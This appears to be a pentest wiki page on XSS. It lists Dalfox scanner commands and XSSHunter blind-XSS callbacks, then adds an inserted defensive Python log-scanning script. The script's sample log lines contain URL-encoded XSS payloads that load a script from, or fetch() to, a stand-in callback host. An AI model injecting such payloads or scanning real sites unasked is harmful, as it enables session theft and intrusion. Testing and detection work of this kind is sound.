Pentest List Wiki

Cross-Site Scripting

How to exploit cross-site scripting (XSS).


Last updated 11 months ago

Standard XSS

Dalfox

Dalfox is a powerful open-source XSS scanner and utility focused on automation.

The following command will take an HTTP request saved to a file named HTTPREQUEST and look for XSS, including blind XSS if you use the -b flag with a blind XSS URL.

dalfox file --rawdata HTTPREQUEST -b <blind_xss_link>

The following command will take a URL and look for XSS, including blind XSS if you use the -b flag with a blind XSS URL.

dalfox url URL -b <blind_xss_link>

Blind XSS

XSSHunter

XSSHunter provides a weaponised URL to insert into XSS payloads to test for blind XSS. The easiest way to use XSSHunter is through TruffleSecurity's own hosted platform.

For those that are more security and privacy conscious, you may wish to set up a private instance:
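As an added example (not part of the wiki), the following Python script shows the defensive side of the blind XSS testing described above: because a blind payload has to reference its callback URL, that URL is present in the request that delivered it, so the script decodes the query parameters in constructed web server log lines and flags any parameter that contains HTML markup loading a resource from a host outside an allowlist. The log lines, the callback host and the allowlist are constructed placeholders.

```python
"""Flag blind-XSS-style probes (HTML payloads carrying a remote callback URL) in access logs."""
import re
from urllib.parse import unquote_plus, urlparse

# Hosts the application legitimately references in markup (constructed allowlist);
# any other host loaded from inside a submitted parameter is treated as a callback.
TRUSTED_HOSTS = {"static.example.com"}

# Constructed sample log lines in combined log format; IPs and hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fcallback.invalid%2Fx%3E%3C%2Fscript%3E HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /profile?bio=%3Cimg%20src%3Dx%20onerror%3D%22fetch('https://callback.invalid/c')%22%3E HTTP/1.1" 200 900
203.0.113.9 - - [10/Oct/2023:13:56:05 +0000] "GET /page?ref=https%3A%2F%2Fstatic.example.com%2Fa.js HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
# A tag that can load a remote resource, or an inline event handler.
MARKUP_RE = re.compile(r"<\s*(script|img|iframe|svg|body)\b|on\w+\s*=", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)


def external_hosts(decoded: str) -> set:
    """Return hosts referenced by absolute URLs in the decoded value, minus the allowlist."""
    hosts = (urlparse(u).hostname for u in URL_RE.findall(decoded))
    return {h for h in hosts if h and h not in TRUSTED_HOSTS}


def flag_blind_xss(log_text: str) -> list:
    """Return one finding per query parameter that holds markup plus an external callback host."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlparse(m.group(1)).query
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            decoded = unquote_plus(raw)  # payloads are almost always URL-encoded
            if not MARKUP_RE.search(decoded):
                continue
            hosts = external_hosts(decoded)
            if hosts:
                hits.append({"client": line.split()[0], "param": name,
                             "callback_hosts": sorted(hosts)})
    return hits


if __name__ == "__main__":
    for hit in flag_blind_xss(SAMPLE_LOG):
        print(hit)
```

Finding a callback host you do not recognise means an attacker (or a tester) has planted a blind payload; the next step is locating where that parameter value was stored and who rendered it.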

https://github.com/hahwul/dalfox
https://xsshunter.trufflesecurity.com/app/#/
https://github.com/trufflesecurity/xsshunter